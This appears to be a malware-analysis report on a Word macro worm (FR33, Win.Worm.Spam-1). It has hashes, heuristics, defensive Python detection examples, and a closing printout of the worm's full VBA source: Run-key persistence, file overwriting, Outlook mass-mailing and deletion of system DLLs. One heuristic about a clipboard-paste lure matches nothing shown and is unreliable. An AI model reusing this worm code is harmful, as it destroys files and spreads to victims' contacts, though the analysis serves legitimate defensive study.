Win.Worm.Spam-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 c1c8c75f96df928e…

MALICIOUS

Office (OLE)

Size: 45.5 KB
Created: 2000-07-20 09:13:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: dee9a11ae159dcaee1977ebc72bd8da3
SHA-1: 805fa386d3af5302fc97f4901955475034033f91
SHA-256: c1c8c75f96df928e6b7434896dce22a613de522bc596007134f20c6da8201e26
Risk score: 488

Malware Insights

Win.Worm.Spam-1 · confidence 95%

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder
  • T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)
  • T1105 Ingress Tool Transfer

The sample's VBA is a Document_Open procedure, so it runs when the document is opened; On Error Resume Next suppresses every failure. It calls Shell "Mkdir C:\Windows\lizards" (Shell launches executables, not cmd.exe built-ins such as Mkdir, so this call fails silently) and then uses WScript.Shell.RegWrite to set HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm to 'wscript.exe c:\windows\FR33.doc %', a logon-time autostart entry (on NT-based Windows the HKLM write also requires administrative rights). The remaining procedures in the module are defined but never called from Document_Open: Dodrives/Subfolders overwrite every .com, .vbs and .doc file on all ready and network drives with the worm, Outlook() mails c:\windows\FR33.doc to every address-book entry under the subject "Here you have, ;o)", FileCopy() and Kill() target wsock32.dll and the ICQ installation, and Antidelete() re-creates the script in a tight loop whenever it is removed. Three facts limit the real impact: the propagation code is unreachable, the file is never copied to c:\windows\FR33.doc, and Dodrives, Subfolders and Antidelete rely on wscript.scriptfullname, which exists only under Windows Script Host and not inside Word (Dodrives also misspells "scripting" as "scipting"). The Run-key value is the only persistent change, and wscript.exe has no script engine for a .doc file, so even that entry errors at logon. Note also that in the extracted source Document_Open appears under Module1 rather than the ThisDocument class module (FR33); Word fires Document_Open only from ThisDocument, so if the dump reflects the real module layout the macro would not auto-execute at all, unlike an AutoOpen procedure, which runs from any module.
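
The "defined but never called" point above is easy to verify mechanically. The following is an added example, not part of this report or of oletools: a minimal reachability check over decoded VBA source that splits the module into procedures, builds a call graph (ignoring names that appear only in strings or comments) and walks it from the auto-exec entry points. The input is a constructed abridgement of the FR33 macro quoted on this page; the AUTOEXEC set and the EXEC primitive list are assumptions chosen for this example.

```python
import re

# Constructed sample: the FR33 macro quoted on this page, abridged to its
# procedure skeleton (same procedure names, same entry point, same calls).
SAMPLE_VBA = r'''
Private Sub Document_Open()
On Error Resume Next
Doc.TaskVisible = False
Shell "Mkdir C:\Windows\lizards", 0
'Makes the folder lizards in the windows directory
Set ws = CreateObject("WScript.Shell")
ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm", "wscript.exe c:\windows\FR33.doc %"
End Sub

Function Dodrives()
Set fso = CreateObject("scipting.filesystemobject")
For Each Drive In fso.Drives
Call Subfolders(Drive & "\")
Next
End Function

'This function infects other files with the FR33.doc
Function Subfolders(path)
For Each Subfol In fso.GetFolder(path).Subfolders
Call Subfolders(Subfol.path)
Next
End Function

Function Outlook()
Set OutlookApp = CreateObject("Outlook.Application")
End Function

Function Kill()
Kill "C:\Windows\System\wsock32.dll*.*"
Shell "C:\Windows\lizards\ ren wsock32.dll wsock32.gos", 0
End Function

Function Antidelete()
Set fso = CreateObject("scripting.filesystemobject")
End Function
'''

# Procedure names the Office hosts run without user interaction (assumed list).
AUTOEXEC = {"document_open", "autoopen", "auto_open", "autoexec",
            "workbook_open", "document_close", "autoclose"}

PROC_DEF = re.compile(
    r'^\s*(?:(?:Private|Public|Friend)\s+)?(?:Static\s+)?(Sub|Function)\s+(\w+)\s*\(',
    re.I | re.M)
PROC_END = re.compile(r'^\s*End\s+(?:Sub|Function)\b', re.I | re.M)
STRING = re.compile(r'"(?:[^"]|"")*"')          # VBA literal; "" escapes a quote
IDENT = re.compile(r'\b[A-Za-z_]\w*\b')
# Primitives that act outside the document (assumed list for this example).
EXEC = re.compile(r'(?<![\w.])Shell\b|\bCreateObject\s*\(|\.RegWrite\b|\.Run\b|\.Exec\b', re.I)


def strip_code(line):
    """Blank out string literals and drop trailing comments, so procedure
    names mentioned in comments or strings are not counted as calls."""
    return STRING.sub('""', line).split("'", 1)[0]


def split_procedures(src):
    """Map each Sub/Function name (lower-cased) to its body text."""
    procs = {}
    for m in PROC_DEF.finditer(src):
        end = PROC_END.search(src, m.end())
        procs[m.group(2).lower()] = src[m.end():end.start() if end else len(src)]
    return procs


def call_graph(procs):
    """Edges from each procedure to the other procedures it names in code."""
    graph = {}
    for name, body in procs.items():
        code = "\n".join(strip_code(ln) for ln in body.splitlines())
        idents = {w.lower() for w in IDENT.findall(code)}
        graph[name] = {p for p in procs if p in idents and p != name}
    return graph


def reachable(graph, roots):
    """Procedures transitively reachable from the auto-exec entry points."""
    seen, stack = set(), [p for p in graph if p in roots]
    while stack:
        p = stack.pop()
        if p not in seen:
            seen.add(p)
            stack.extend(graph[p])
    return seen


def triage(src):
    """Return what runs on open, what is dead code, and the effective actions."""
    procs = split_procedures(src)
    live = reachable(call_graph(procs), AUTOEXEC)
    actions = [ln.strip() for p in sorted(live)
               for ln in procs[p].splitlines() if EXEC.search(strip_code(ln))]
    return {"live": sorted(live), "dead": sorted(set(procs) - live), "actions": actions}


if __name__ == "__main__":
    result = triage(SAMPLE_VBA)
    print("runs on open :", ", ".join(result["live"]))
    print("never called :", ", ".join(result["dead"]))
    for action in result["actions"]:
        print("  ->", action)
```

On the sample, only Document_Open is live and its effective actions reduce to the Shell call and the two WScript.Shell lines; Dodrives, Subfolders, Outlook, Kill and Antidelete are reported as dead. The check is deliberately conservative: a procedure invoked through Application.Run or CallByName with a string argument would be missed, which is exactly why strings are blanked out rather than searched.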

Heuristics 10

  • ClamAV: Win.Worm.Spam-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Worm.Spam-1
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Doc.TaskVisible = False
    Shell "Mkdir C:\Windows\lizards", 0
    'Makes the folder lizards in the windows directory
  • WScript.Shell usage critical OLE_VBA_WSCRIPT
    WScript.Shell usage
    Matched line in script
    'Makes the folder lizards in the windows directory
    Set ws = CreateObject("WScript.Shell")
    ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm", "wscript.exe c:\windows\FR33.doc %"
  • LOLBin reference in VBA critical OLE_VBA_LOLBIN
    LOLBin reference in VBA
    Matched line in script
    Set ws = CreateObject("WScript.Shell")
    ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm", "wscript.exe c:\windows\FR33.doc %"
    End Sub
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    'Makes the folder lizards in the windows directory
    Set ws = CreateObject("WScript.Shell")
    ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm", "wscript.exe c:\windows\FR33.doc %"
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_Open()
    On Error Resume Next
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • Clipboard command execution lure high SE_CLIPBOARD_COMMAND_LURE
    Document tells the user to copy or paste clipboard content into Run, PowerShell, cmd, or another shell-like execution context
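
The findings above are the output of line-level pattern rules plus one source-independent token rule. The following is an added example, not the analyser's own code (the page does not show its rule logic): equivalents of the OLE_VBA_* heuristics as regular-expression rules that report the matched line with one line of context each side, and the auto-exec/execution token co-occurrence check the p-code finding describes, applied to a raw byte stream in both ASCII and UTF-16LE spelling. Rule identifiers and severities reuse the page's labels where a counterpart exists; OLE_VBA_RUNKEY and the token lists are assumptions, and the input is the Document_Open procedure quoted above, embedded as a constructed sample.

```python
import re

# Constructed sample: the Document_Open procedure quoted in the findings above.
SAMPLE = r'''Private Sub Document_Open()
On Error Resume Next
Doc.TaskVisible = False
Shell "Mkdir C:\Windows\lizards", 0
'Makes the folder lizards in the windows directory
Set ws = CreateObject("WScript.Shell")
ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm", "wscript.exe c:\windows\FR33.doc %"
End Sub
'''

# (rule id, severity, pattern). Ids and severities follow the page's labels;
# OLE_VBA_RUNKEY is an assumed extra rule for Run-key persistence.
RULES = [
    ("OLE_VBA_DOCOPEN",   "low",      re.compile(r'\bSub\s+(Document_Open|AutoOpen|Auto_Open|Workbook_Open)\b', re.I)),
    ("OLE_VBA_SHELL",     "critical", re.compile(r'(?<![\w.])Shell\b', re.I)),   # not WScript.Shell
    ("OLE_VBA_WSCRIPT",   "critical", re.compile(r'WScript\.Shell', re.I)),
    ("OLE_VBA_CREATEOBJ", "high",     re.compile(r'\bCreateObject\s*\(', re.I)),
    ("OLE_VBA_LOLBIN",    "critical", re.compile(r'\b(wscript|cscript|mshta|regsvr32|rundll32|certutil|powershell)\.exe\b', re.I)),
    ("OLE_VBA_RUNKEY",    "critical", re.compile(r'\\CurrentVersion\\Run(Once)?\\', re.I)),
]


def scan_source(src):
    """Apply every rule line by line; each hit carries the matched line and
    one line of context on either side, as the report above shows."""
    lines = src.splitlines()
    findings = []
    for rule_id, severity, rx in RULES:
        for i, line in enumerate(lines):
            if rx.search(line):
                findings.append({"id": rule_id, "severity": severity, "line": i + 1,
                                 "matched": line.strip(),
                                 "context": lines[max(0, i - 1):i + 2]})
    return findings


def severity_counts(findings):
    counts = {}
    for f in findings:
        counts[f["severity"]] = counts.get(f["severity"], 0) + 1
    return counts


# Token lists for the source-independent rule (assumed for this example).
AUTOEXEC_TOKENS = [b"Document_Open", b"AutoOpen", b"Auto_Open", b"Workbook_Open", b"AutoExec"]
EXEC_TOKENS = [b"Shell", b"CreateObject", b"WScript", b"URLDownloadToFile", b"ShellExecute"]


def _present(stream, token):
    """Case-insensitive search for the token as ASCII or as UTF-16LE."""
    low = stream.lower()
    return token.lower() in low or token.decode().encode("utf-16-le").lower() in low


def pcode_autoexec_exec(stream):
    """Check for a raw module or cache stream: fire when an auto-exec token and an
    execution token both occur, which covers p-code-only documents and cases
    where source decompression failed and no VBA text is available."""
    auto = [t.decode() for t in AUTOEXEC_TOKENS if _present(stream, t)]
    execs = [t.decode() for t in EXEC_TOKENS if _present(stream, t)]
    return {"fires": bool(auto and execs), "autoexec": auto, "exec": execs}


if __name__ == "__main__":
    hits = scan_source(SAMPLE)
    for f in hits:
        print(f'{f["id"]:<18} {f["severity"]:<8} line {f["line"]}: {f["matched"]}')
    print("by severity:", severity_counts(hits))
    print("p-code rule:", pcode_autoexec_exec(SAMPLE.encode()))
```

Against the sample this yields one hit per rule (six in total, four of them critical), and the byte-level rule fires on Document_Open together with Shell, CreateObject and WScript. The negative lookbehind in OLE_VBA_SHELL keeps the Shell rule from double-counting "WScript.Shell", which the separate OLE_VBA_WSCRIPT rule already covers.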

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 3601 bytes
SHA-256: 660665b0dc9b2f841b4c4528e5c0c02b99a58734677594d0d691313faca272e8
Detection
ClamAV: Win.Worm.Spam-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "FR33"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"
'The FR33 worm
'This is very deadly but i am not sure if it will work
'by tubuznock
'JUNE 2000

Private Sub Document_Open()
On Error Resume Next
FREE.Visible = False
Doc.TaskVisible = False
Shell "Mkdir C:\Windows\lizards", 0
'Makes the folder lizards in the windows directory
Set ws = CreateObject("WScript.Shell")
ws.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Worm", "wscript.exe c:\windows\FR33.doc %"
End Sub

Function Dodrives()
On Error Resume Next
Set fso = CreateObject("scipting.filesystemobject")
Set Drives = fso.Drives
For Each Drive In Drives
If Drive.Drivetype = Remote Then
Drivefull = Drive & "\"
Call Subfolders(Drivefull)
ElseIf Drive.IsReady Then
Drivefull = Drive & "\"
Call Subfolders(Drivefull)
End If
Next
End Function
'This function infects other files with the FR33.doc
'It infects .com .doc and .vbs files and replaces it with the FR33.doc
Function Subfolders(path)
Set Fold = fso.GetFolder(path)
Set Files = Fold.Files
For Each file In Files
If fso.GetExtensionName(file.path) = "com" Then
fso.copyfile wscript.scriptfullname, file.path, True
End If
If fso.GetExtensionName(file.path) = "vbs" Then
fso.copyfile wscript.scriptfullname, file.path, True
End If
If fso.GetExtensionName(file.path) = "doc" Then
fso.copyfile wscript.scriptfullname, file.path, True
End If
Next
Set file = Fold.Subfolders
For Each Subfol In file
Call Subfolders(Subfol.path)
Next
End Function

'Hohoho, Outlook Replication
'An e-mail is sent to everyone in the victims address book
'Attaches the worm to every e-mail
Function Outlook()
On Error Resume Next
Set OutlookApp = CreateObject("Outlook.Application")
If OutlookApp = "Outlook" Then
Set Mapi = OutlookApp.GetNameSpace("MAPI")
For Each Addresslist In Mapi.AddressLists
If Addresslist.AddressEntries.Count <> 0 Then
Addresslistcout = Addresslist.AddressEntries.Count
For AddList = 1 To Addresslistcout
Set msg = OutlookApp.CreateItem(0)
Set AdEntries = Addresslist.AddressEntries(AddList)
msg.To = AdEntries.Address
msg.Subject = "Here you have, ;o)"
msg.Body = "Hi:" & vbCrLf & "Check This!"
Set Attachs = msg.Attachments
Attachs.Add "c:\windows\FR33.doc"
msg.DeleteAfterSubmit = True
If msg.To <> "" Then
msg.Send
End If
Next
End If
Next
End If
End Function

Function FileCopy()
FileCopy "C:\Windows\System\wsock32.dll, C:\Windows\lizards"
End Function

'All this does is first delete the wsock32.dll in the system folder,
'and rename wsock32.dll to wsock32.gos
Function Kill()
Kill "C:\Windows\System\wsock32.dll*.*"
Shell "C:\Windows\lizards\ ren wsock32.dll wsock32.gos", 0
Kill "C:\Program Files\ICQ\DLL\ICQWSOCK32.dll*.*"
Kill "C:\Program Files\ICQ\DLL\RasDLL.dll*.*"
Kill "C:\Program Files\ICQ\icq.exe*.*"
End Function

'This is a loony function i got from [K]Alamar's worm generator
'It is called the anti-deletion method.
'Every time a copy of the Happ00 is deleted a new one is made.
Function Antidelete()
Set fso = CreateObject("scripting.filesystemobject")
Set Myself = fso.opentextfile(wscript.scriptfullname, 1)
MyCode = Myself.readall
Myself.Close
Do
If Not (fso.fileexists(wscript.scriptfullname)) Then
Set Myself = fso.createtextfile(wscript.scriptfullname, True)
Myself.write MyCode
Myself.Close
End If
Loop
End Function